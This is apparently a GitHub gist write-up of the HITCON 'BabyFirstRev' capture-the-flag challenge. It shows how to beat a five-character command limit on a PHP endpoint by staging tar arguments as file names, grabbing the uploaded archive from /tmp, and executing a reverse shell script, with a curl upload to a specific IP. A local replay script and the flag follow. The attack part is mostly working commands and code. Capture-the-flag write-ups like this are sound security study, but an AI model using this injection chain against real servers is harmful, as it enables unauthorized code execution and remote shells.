@pgy
Last active November 7, 2017 22:34
BabyFirstRev writeup

BabyFirstRev

tldr: who needs rev when you have tar

Every command sent below is at most five characters, so the argument words cannot be typed in; they are staged as file names in the sandbox and assembled by the shell's pathname expansion of *. Prepare a tar archive like this:

$ mkdir a
$ cat reverse/shell/script > a/s
$ chmod +x a/s
$ tar cf shell.tar a

In the sandbox, create three empty files named after the words of the tar command (their sorted names become its argv):

>tar
>vcf
>z

POST shell.tar and send cmd=* /t* in the same request. PHP keeps the upload as /tmp/phpRANDOM only until that request finishes, so the archive has to be captured while the file is still there. Pathname expansion turns * into tar vcf z (the three file names, sorted) and /t* into /tmp, so the server runs tar vcf z /tmp and writes an archive of /tmp to ./z:

$ curl -F "file=@shell.tar" "http://52.199.204.34/?cmd=*%20%2Ft*"

(The form field name is arbitrary; PHP stores every uploaded file under /tmp regardless of which field carries it.)

Replace vcf with vxf so that * now expands to tar vxf z, and unpack ./z; this recreates /tmp as ./tmp:

rm v*       # rm vcf
>vxf
*           # tar vxf z

rm without -r refuses directories, so rm * deletes the helper files and leaves ./tmp in place:

rm *

Rename ./tmp to ./xf (so that * will read tar xf once a file called tar exists) and create that empty file:

>mv
* xf        # mv tmp xf
rm mv
>tar

Now the directory tree is:

./tar
./xf
./xf/phpRANDOM  # our shell.tar file

Extract the reverse shell script and execute it. This step assumes phpRANDOM was the only entry in /tmp when the archive was taken: */* must expand to exactly one name, because tar treats any further arguments as member names to extract rather than as archives:

* */*       # tar xf xf/phpRANDOM
a/s

hitcon{idea_from_phith0n,thank_you:)}
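The whole chain, replayed locally as an added example (this is not part of the original writeup): a throwaway directory stands in for the sandbox, $WORK/tmp for /tmp, phpABC123 for the random name PHP picks for the upload, and a/s writes pwned.txt instead of calling back. The only command that cannot go through the five-character gate is the first tar, because the stand-in for /tmp has a longer path than /t*; every other command is typed exactly as above, and the script prints what each * expands to before running it.

```sh
#!/bin/sh
# Added example, not the writeup's own code: replay the filename-as-argv chain
# in a scratch directory. Stand-ins (assumptions, not the target's layout):
#   $SANDBOX   the directory the injected commands run in (cwd of exec())
#   $WORK/tmp  plays /tmp, where PHP parks the upload as phpRANDOM
#   phpABC123  the random upload name PHP would pick
#   a/s        writes pwned.txt instead of spawning a reverse shell
set -eu

# The target's limit: five characters, spaces and globs included.
within_limit() { [ "${#1}" -le 5 ]; }

# Gate a command the way the target does, show what its globs expand to, then
# run it with the sandbox as cwd. Errors (rm on a directory, tar warnings) are
# swallowed, as they were on the target.
run5() {
    cmd=$1
    within_limit "$cmd" || { echo "rejected (${#cmd} chars): $cmd" >&2; return 1; }
    case $cmd in
        *">"*) printf '%-6s    (creates empty file %s)\n' "$cmd" "${cmd#>}" ;;
        *)     ( cd "$SANDBOX" && printf '%-6s -> ' "$cmd" && sh -c "printf '%s ' $cmd; echo" ) ;;
    esac
    ( cd "$SANDBOX" && sh -c "$cmd" >/dev/null 2>&1 ) || true
}

replay_chain() {
    WORK=$(mktemp -d)
    SANDBOX=$WORK/sandbox
    mkdir -p "$SANDBOX" "$WORK/tmp" "$WORK/a"

    # 1. shell.tar with the payload at a/s (constructed stand-in for the script).
    printf '#!/bin/sh\necho pwned > pwned.txt\n' > "$WORK/a/s"
    chmod +x "$WORK/a/s"
    ( cd "$WORK" && tar cf shell.tar a )

    # 2. The POST: PHP keeps the body as /tmp/phpRANDOM only while the request
    #    runs, so on the target the tar command must ride the same request.
    cp "$WORK/shell.tar" "$WORK/tmp/phpABC123"

    # 3. Stage the words of the tar command as file names; * assembles them.
    run5 '>tar'; run5 '>vcf'; run5 '>z'
    # On the target this is `* /t*` -> `tar vcf z /tmp`. Here the stand-in for
    # /tmp is ../tmp from the sandbox (7 chars, over the limit), so only the
    # path differs; tar strips the leading ../ and stores tmp/phpABC123.
    ( cd "$SANDBOX" && sh -c '* ../tmp' >/dev/null 2>&1 ) || true

    # 4. Swap vcf for vxf: * now reads `tar vxf z`, which unpacks ./tmp/phpABC123.
    run5 'rm v*'; run5 '>vxf'; run5 '*'

    # 5. rm without -r cannot delete the tmp directory, so only the helpers go.
    run5 'rm *'

    # 6. Rename tmp to xf so that * reads `tar xf` once a tar file exists.
    run5 '>mv'; run5 '* xf'; run5 'rm mv'; run5 '>tar'

    # 7. * -> `tar xf`, */* -> `xf/phpABC123`: extract shell.tar, then run a/s.
    run5 '* */*'; run5 'a/s'

    [ -f "$SANDBOX/pwned.txt" ]
}

replay_chain && echo "payload ran in $SANDBOX"
```

Run it with sh; each line of output pairs the five-character command with the argv the shell actually built from the sandbox's file names, which makes the sort-order dependence (tar before vcf before z, mv before tmp) visible.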

No, we did not compress and download /. Not even once.
